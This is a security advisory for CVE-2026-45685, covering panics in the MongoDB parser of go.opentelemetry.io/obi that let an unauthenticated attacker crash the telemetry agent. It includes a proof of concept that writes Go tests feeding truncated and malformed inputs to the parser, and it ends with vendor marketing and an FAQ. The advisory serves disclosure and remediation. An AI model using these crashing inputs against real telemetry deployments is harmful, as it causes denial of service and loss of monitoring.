Summary
Malformed MongoDB wire messages can trigger uncaught panics in the MongoDB TCP parser, allowing a remote unauthenticated attacker to crash the telemetry agent and cause a denial of service. The parser operates on raw attacker-controlled network payloads before the input is fully validated, so a single crafted message can terminate telemetry collection for the affected process or node.
Details
MongoDB parsing support was introduced by commit 2070f568a (Add Initial support for mongodb), so the explicit released version minimum affected is v0.1.0.
There are two related panic conditions in released go.opentelemetry.io/obi versions:
- In
v0.1.0throughv0.3.0,parseOpMessagereads OP_MSG flag bits frombuf[msgHeaderSize:msgHeaderSize+int32Size]without first ensuring the buffer is at leastmsgHeaderSize + int32Sizebytes long. A truncated OP_MSG packet can therefore trigger a slice-bounds panic before the parser returns an error. - In
v0.1.0throughv0.3.0,parseSectionsconsumes the section type byte and then reads the document-sequence length frombuf[offSet:offSet+int32Size]without re-validating that enough bytes remain after the type byte. A malformed document-sequence section can therefore trigger another slice-bounds panic. - In
v0.1.0throughv0.8.0,parseFirstFieldassumes the collection name for collection-scoped commands is always a string and performs an unchecked type assertion onfield.Value. A malformed BSON document can therefore trigger a runtime panic withinterface conversioninstead of returning a parse error.
The bounds-check panic was fixed by commit 3aa58cdaaa97fbb72f8ef4c3609ae425aacaf8bb (Fix MongoDB client panic), which first appears in release v0.4.0. The unchecked BSON type assertion is still present in v0.8.0.
Because this code runs while decoding attacker-controlled MongoDB traffic, the failure mode is process termination rather than graceful rejection of invalid input. In deployments where the telemetry agent monitors traffic from untrusted or partially trusted clients, a single malformed packet can terminate collection until the agent is restarted.
Affected code paths are in pkg/ebpf/common/mongo_detect_transform.go and correspond to parseOpMessage, parseSections, and parseFirstField.
PoC
The following reproductions are fully self-contained. They create a temporary test file inside an affected checkout and then run go test against the real parser code in the repository.
Reproduce the
v0.1.0throughv0.3.0bounds-check panics:git clone https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation.git obi-poc cd obi-poc git checkout v0.3.0 cat > pkg/ebpf/common/mongo_security_poc_test.go <<'EOF' package ebpfcommon import "testing" func TestSecurityPoCParseOpMessageShortPanics(t *testing.T) { parseOpMessage(make([]byte, 16), 0, false, nil) } func TestSecurityPoCParseSectionsShortDocSequencePanics(t *testing.T) { parseSections([]byte{byte(sectionTypeDocumentSequence), 0x01, 0x02, 0x03}) } EOF go test ./pkg/ebpf/common -run 'TestSecurityPoCParseOpMessageShortPanics|TestSecurityPoCParseSectionsShortDocSequencePanics' -count=1Expected result:
TestSecurityPoCParseOpMessageShortPanicspanics with a message similar toslice bounds out of range [:20] with capacity 16TestSecurityPoCParseSectionsShortDocSequencePanicspanics with a message similar toslice bounds out of range [:5] with capacity 4
Reproduce the
v0.1.0throughv0.8.0unchecked BSON type-assertion panic:git clone https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation.git obi-poc cd obi-poc git checkout v0.8.0 cat > pkg/ebpf/common/mongo_security_poc_test.go <<'EOF' package ebpfcommon import ( "testing" "go.mongodb.org/mongo-driver/v2/bson" ) func TestSecurityPoCParseFirstFieldTypeAssertionPanics(t *testing.T) { parseFirstField(bson.E{Key: commFind, Value: int32(123)}) } EOF go test ./pkg/ebpf/common -run TestSecurityPoCParseFirstFieldTypeAssertionPanics -count=1Expected result: panic with a message similar to
interface conversion: interface {} is int32, not string.
Impact
This is a remote denial-of-service vulnerability in the MongoDB protocol parser. Any deployment that enables MongoDB parsing and processes attacker-controlled or malformed MongoDB traffic is impacted. Successful exploitation lets an unauthenticated attacker crash the telemetry agent by sending a crafted OP_MSG packet or malformed BSON document, causing loss of observability until the process is restarted.
The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths. Typical impact: varies by context: data corruption, logic bypass, or denial of service.
CVE-2026-45685 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.9.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-45685? CVE-2026-45685 is a high-severity improper input validation vulnerability in go.opentelemetry.io/obi (go), affecting versions < 0.9.0. It is fixed in 0.9.0. The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths.
- How severe is CVE-2026-45685? CVE-2026-45685 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of go.opentelemetry.io/obi are affected by CVE-2026-45685? go.opentelemetry.io/obi (go) versions < 0.9.0 is affected.
- Is there a fix for CVE-2026-45685? Yes. CVE-2026-45685 is fixed in 0.9.0. Upgrade to this version or later.
- Is CVE-2026-45685 exploitable, and should I be worried? Whether CVE-2026-45685 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-45685 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-45685? Upgrade
go.opentelemetry.io/obito 0.9.0 or later.